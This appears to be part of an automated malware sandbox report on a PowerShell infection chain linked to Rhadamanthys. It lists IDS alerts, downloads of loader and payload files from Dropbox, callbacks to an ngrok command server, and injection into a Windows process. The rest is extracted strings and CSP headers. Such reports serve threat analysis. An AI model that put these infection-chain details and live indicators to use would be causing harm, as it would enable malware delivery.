                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: b.pdb source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 854113748.exe, 0000001D.00000003.2340149595.0000000000F20000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340267249.0000000002E50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345418878.0000000005710000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345179644.00000000039C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbSv"P source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb source: 854113748.exe, 0000001A.00000000.2141718264.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.0000000002420000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 26_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose, 26_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 26_2_004631F0 FindFirstFileW,FindNextFileW,FindClose, 26_2_004631F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 26_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW, 26_2_0045A7D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 26_2_00462F00 FindFirstFileW,FindClose, 26_2_00462F00
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 29_2_00411150 FindFirstFileW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,StrFormatByteSizeW,GetPrivateProfileStringW,FindNextFileW,FindClose, 29_2_00411150
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 29_2_004631F0 FindFirstFileW,FindNextFileW,FindClose, 29_2_004631F0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 29_2_0045A7D0 GetDiskFreeSpaceExW,GetDiskFreeSpaceW,FindFirstFileW,FindClose,GetDiskFreeSpaceW, 29_2_0045A7D0
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exe Code function: 29_2_00462F00 FindFirstFileW,FindClose, 29_2_00462F00
                      Source: C:\Windows\System32\fontdrvhost.exe Code function: 4x nop then dec esp, 34_2_000001795E5A0511

                      Networking

                      barindex
                      Source: Network traffic, Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 162.213.210.250:6499 -> 192.168.2.4:49834
                      Source: global traffic, TCP traffic: 192.168.2.4:49834 -> 162.213.210.250:6499
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeHTTP traffic: Redirect from: www.dropbox.com to https://uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com/cd/0/get/cgdboqi0xx9lrfnkbibhrk2o5a90nugp4szyd76wgsl8uv2e3xrvnp-wd27q_acudd072v7-jemmeubodu5z4njggyrmzhnxcbk66wtc9b1ke5hfwiu4dumwuuuqrum5yggy8zvi3r3pao9wkt-hizjn/file?dl=1#
                      Source: Joe Sandbox ViewIP Address: 162.125.65.15 162.125.65.15
                      Source: Joe Sandbox ViewIP Address: 162.125.69.18 162.125.69.18
                      Source: Joe Sandbox ViewIP Address: 162.125.69.15 162.125.69.15
                      Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49735 -> 162.125.69.18:443
                      Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49790 -> 162.125.69.18:443
                      Source: global trafficHTTP traffic detected: GET /api/secure/3280fc306b2b1b17d755c31452bd62f7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/nslqaaaucex7u0dud265w/secure.txt?rlkey=3djwq7bnao7gleqen7lk4ym97&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgBYRhUVTjDsxE79MTNoCNhU07mzsblpWfuZAJ1kVr8F5NLHVp5HdRP3LQxOuASaVpkKRl1J1qypCBfX8gbAMtbFBAbF7EmFE1r-hX1wxJZ97dDKiUG-5gUD_1lmXFajsI84SRn-GgCVXa-VdShugwxm/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/alvflaagbv3imslrlvn5w/loader.txt?rlkey=yc2jjmh5k3fj1en6bx0570rlg&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVY2ykIWtYLGNsTT4GwJiMqVt-LQiQkC8J30YyTFZIyU46zoPfriT5Cou1PPRNnXmF1J6aYfMbdSYzAs0pdxsV-K3GvMKlGKRnKD6p-rdYVNvrnTb2JA6RtOIHYrfIc/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc99c9846721962dead0990bdd22.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1Host: www.dropbox.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDBoQi0xx9LrfNKbiBhRK2o5A90NugP4SzyD76WgsL8Uv2E3XrvNp-WD27q_ACUDD072v7-jemMeUbODu5Z4NJgGyrMZHNxCbk66wtc9B1kE5Hfwiu4dumWUuuQRuM5yGGy8zvi3r3PaO9WkT-HIZJn/file?dl=1 HTTP/1.1Host: uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                      Source: global trafficHTTP traffic detected: GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgChJqCRdRbWUm7TtbTWVMfwmP4neAvAliJqAmrMytKpYlGQhQrjBjH9XH16NyCWpFjZM7Rcd9WdomKiwbzIi1CuPK0ht4rYR0G3eeb_NMEnMOnNOMxCITGfzLmCkSPgF2rcW3VLbuZ1P1JsssXGh-tK/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.dropbox.com
                      Source: global trafficHTTP traffic detected: GET /cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trw3pFZ50koqTNyngcPBjlOUx6Mk-UmtJOPLSUbbFVUAvs399DdhSh4Vx13Ii9hXtV2PEIyScdLwUWZ78ELshdejUuD6dK4Y1NRzWpo2vF80QzCgctIQTMQC6uKosbo/file?dl=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /metadata/3280fc306b2b1b17d755c31452bd62f7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.appConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.201.209.100
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 204.79.197.237
https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: om/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; report-uri 
https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; base-uri 'self' ; frame-ancestors 'self' https://*.dropbox.com ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; object-src 
'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; media-src https://* blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; font-src https://* data: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com 
https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                      Source: powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; base-uri 'self' ; img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; report-uri 
https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; font-src https://* data: ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; media-src https://* blob: equals www.yahoo.com (Yahoo)
                      Source: global traffic | DNS traffic detected: DNS query: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
                      Source: global traffic | DNS traffic detected: DNS query: www.dropbox.com
                      Source: global traffic | DNS traffic detected: DNS query: uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com
                      Source: global traffic | DNS traffic detected: DNS query: uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com
                      Source: global traffic | DNS traffic detected: DNS query: bzib.nelreports.net
                      Source: global traffic | DNS traffic detected: DNS query: uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com
                      Source: global traffic | DNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: global traffic | DNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global traffic | DNS traffic detected: DNS query: uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com
                      Source: global traffic | DNS traffic detected: DNS query: uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com
                      Source: unknown | HTTP traffic detected: POST /dns-query HTTP/1.1
                          Host: chrome.cloudflare-dns.com
                          Connection: keep-alive
                          Content-Length: 128
                          Accept: application/dns-message
                          Accept-Language: *
                          User-Agent: Chrome
                          Accept-Encoding: identity
                          Content-Type: application/dns-message
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                          Access-Control-Allow-Origin: *
                          Content-Length: 96
                          Content-Type: text/html; charset=utf-8
                          Date: Tue, 10 Dec 2024 17:41:53 GMT
                          Server: Werkzeug/3.0.3 Python/3.12.8
                          Connection: close
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                      Source: msedge.exe, 00000005.00000002.1925094638.000001DFF32AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                      Source: msedge.exe, 00000014.00000002.2139882846.00000187012AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comxg
                      Source: powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                      Source: powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                      Source: msedge.exe, 00000005.00000002.1932816002.0000404000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2143850625.00006F9000020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: msedge.exe, 00000005.00000002.1932816002.0000404000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2143850625.00006F9000020000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: msedge.exe, 00000005.00000002.1933155778.0000404000040000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2143962322.00006F9000040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: powershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
